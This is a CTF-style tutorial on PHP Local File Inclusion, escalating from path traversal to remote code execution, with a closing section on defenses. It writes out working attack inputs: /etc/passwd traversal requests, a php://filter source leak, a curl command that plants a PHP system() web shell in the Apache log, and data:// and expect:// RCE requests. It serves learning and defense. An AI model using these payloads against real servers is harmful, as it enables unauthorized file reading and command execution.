LFI for CTF: From /etc/passwd to RCE

Introduction

The first time someone showed me a ?file=about parameter and asked what I'd try, I had nothing. I knew the word LFI. I'd skimmed a writeup. I just couldn't picture how it worked, or why every guide I opened gave me a different "top five payloads" list with no through-line connecting them.

Here's the through-line. In PHP, where most Local File Inclusion (LFI) lives, include('pages/' . $_GET['file'] . '.php') doesn't sanitize anything. It hands the string to PHP's streams layer, which knows about local files, network protocols, base64 encoding, and a dozen other things you wouldn't expect a file function to know about. Every "LFI payload" you've memorized is the same question with different verbs: what URL scheme will include() happily eat today?

That framing is PHP-shaped. LFI also lives in Java's FileSystemResource, Python's naive os.path.join, and Node's path.resolve. Outside PHP the question shifts: will the framework canonicalize my path before it trusts it? Same trust failure, different machinery. I'll stay in PHP for the rest of this piece because that's where the four-move escalation lives, but the mental model travels.

If you can't tell whether a ?file= parameter is exploitable in sixty seconds, you're leaving the easy half of web-exploitation challenges on the table.

The bug is misplaced trust

PHP's file functions go through what the manual calls the streams layer. A "wrapper" is the code that teaches the streams layer how to talk to a specific protocol or encoding. The list of bundled wrappers, from the Supported Protocols and Wrappers page, covers file://, http://, ftp://, php:// (with half a dozen sub-wrappers), data://, phar://, expect://, and a handful of compression wrappers.

The PHP manual for include() says it directly: "If URL include wrappers are enabled in PHP, you can specify the file to be included using a URL (via HTTP or other supported wrapper [...] instead of a local pathname." (php.net) That sentence is the whole bug. include() was built before "user-controlled filename" was recognized as a category, so the function trusts you to pass it something reasonable. The wrappers turn that trust into a parts catalog.

Move 1: Read the file the server didn't mean to show

The first move is the dumb one. Path traversal.

GET /?file=../../../../etc/passwd

On a vulnerable PHP app, include('pages/' . $_GET['file'] . '.php') becomes pages/../../../../etc/passwd.php, the kernel canonicalizes the path, and that file doesn't exist. There's a trailing .php glued on the end.

This is where every beginner stalls. Older PHP versions let you bolt a null byte onto the end (?file=../../../etc/passwd%00) so the kernel saw the path stop early. The PHP 5.3.4 changelog killed that trick in 2010 ("paths with NULL in them are now considered invalid"), so on a modern stack the null byte does nothing. What saves you is finding code that doesn't append a suffix. include($_GET['page']) instead of include($_GET['page'] . '.php') happens more often than it should, and when it does, Move 1 is the entire exploit.

The canonical picoCTF example is Forbidden Paths. A Flask route joins /usr/share/nginx/html/ to your input and serves whatever opens. ../../../../flag.txt walks back to / and returns the flag. Try %2e%2e%2f if the literal .. is filtered. Try doubling the encoding (%252e%252e%252f) if a middlebox decodes once before the app sees the string.

One more thing. If /etc/passwd renders as a blank page, view the raw HTML source. Plenty of vulnerable apps wrap the include inside a <title> tag or a CSS block, and the file contents are sitting there in the response, invisible until you stop trusting the browser to render them.

Move 2: php://filter leaks the source

Move 1 can't read PHP source. The instant include() opens /var/www/index.php, the parser runs the code and hands you the output, not the source. Annoying, because the source is where the next vulnerability usually lives.

So you stop asking "what file?" and start asking "what wrapper?"

GET /?file=php://filter/convert.base64-encode/resource=index.php

That returns the base64 of index.php. The filter sits between include() and the file read, passes every byte through base64_encode, and the encoded bytes become the "file contents" the parser sees. PHP streams included content to the response body as it reads it, so the base64 string lands in your browser before the parser errors out on the line that isn't valid PHP. You get the source.

There's a research vein on top of this called filter-chain remote code execution (RCE). Filters can do more than base64; they can also do character-set conversions via iconv, and iconv is a near-arbitrary byte transformer if you stack enough conversions in sequence. A player named loknop demonstrated at hxp CTF 2021 (a major German CTF) that the right chain (convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|...) lets you construct arbitrary PHP bytes through include() without uploading a single file. Synacktiv (a French offensive-security firm) generalized the trick in 2022 with a payload generator, and Charles Fol turned it into CVE-2024-2961 in 2024 by abusing a glibc iconv heap overflow. You don't need to know how those work today. You need to know that the technique still pops modern PHP, and the parts catalog is the wrappers manual.

Move 3: Log poisoning (and the /proc/self/environ ghost)

Move 3 is the trick every guide teaches. It's also the trick that doesn't work on a default modern box. Worth knowing because the technique outlives the configuration that killed it.

The idea: get the server to write your attacker-controlled string into a file you're allowed to include, then include that file as PHP. Apache logs the User-Agent of every request, and curl -A sets the User-Agent header for you. So:

# Step 1: poison the log via the User-Agent header
curl -A '<?php system($_GET["c"]); ?>' http://target/
 
# Step 2: include the log and pass a command
GET /?file=../../../var/log/apache2/access.log&c=id

The server logs your payload, then includes the log, then runs the PHP it finds in your User-Agent. You get the output of id as www-data. Game over.

Here's the catch. On Ubuntu 22.04 and 24.04, /var/log/apache2/access.log is owned root:adm with mode 640, and www-data is not in the adm group. The PHP process can't read the log. You get permission-denied silently and nothing happens. The trick is alive on misconfigured boxes, custom Docker images with permissive log perms, training labs, and CTF challenges that deliberately set it up. On a vanilla install today, it's dead.

The same idea used to power /proc/self/environ as a sink: inject PHP into the User-Agent header, then ?file=/proc/self/environ. That trick died when most LAMP stacks migrated from mod_php (the old Apache module that ran PHP in-process) to PHP-FPM (the FastCGI process manager that handles PHP requests in dedicated worker pools today). FPM doesn't push HTTP request headers into the worker's Linux environ; they live in $_SERVER instead. The file is still readable. It just doesn't have your payload in it.

Learn both. Don't expect either. Always run ls -la /var/log/apache2/ via Move 1 first to see whether the perms are sane before you bother poisoning anything.

Move 4: data:// and expect:// (when the sysadmin slipped)

Move 4 is the museum exhibit, and you should still try it. It costs you one request.

If allow_url_include was flipped to On:

GET /?file=data:text/plain,<?php system('id'); ?>
GET /?file=expect://id

data:// inlines the PHP source straight into the URL. expect:// runs the command directly, but only if the operator installed the PECL Expect extension (PECL is PHP's optional-extensions repository), which almost no one does outside of intentionally-vulnerable training builds.

Where you'll actually hit this in the wild: legacy LAMP boxes where someone flipped the toggle for an old dependency, bad shared hosting that exposes the setting through a customer-editable php.ini, and CTF challenges that set allow_url_include=On as the implicit hint. Try it after Move 2 fails and before you walk away.

The pattern behind every LFI

Here are all four moves side by side.

Move	Needs allow_url_include?	What you get	Works on default 2026 stack?
../../etc/passwd	No	File contents	Yes
php://filter	No	PHP source as base64; full RCE via filter chain	Yes
log poisoning	No	RCE as www-data	Only if log perms are loose
data://, expect://	Yes	Inline-source RCE	No, almost never

The pattern lives in the PHP docs, which is the frustrating part. The Supported Protocols and Wrappers page is a parts catalog. Most guides treat each wrapper as a distinct trick to memorize, when they're one design choice (file functions go through the streams layer, anyone can plug a new scheme in via stream_wrapper_register) explored through different schemes.

Outside PHP, the question changes. Java's 2024 Spring path-traversal CVEs (CVE-2024-38816) aren't about URL schemes; they're about FileSystemResource not canonicalizing before it trusts. Python LFI lives in naive os.path.join without a startsWith(base) check. The defense is the same in every language: PortSwigger spells it out. Canonicalize the resolved path, verify it starts with the base directory you meant, allow-list the filename component. Don't sanitize by stripping ... Attackers double-encode.

The next time you see a ?file= parameter, don't reach for a wordlist. Open the PHP wrappers manual and ask what scheme the parser will eat.

Related picoCTF writeups

Forbidden Paths Notepad SOAP Super Serial

Command Injection for CTF SSRF for CTF File Upload Exploitation Web Challenges in the Real World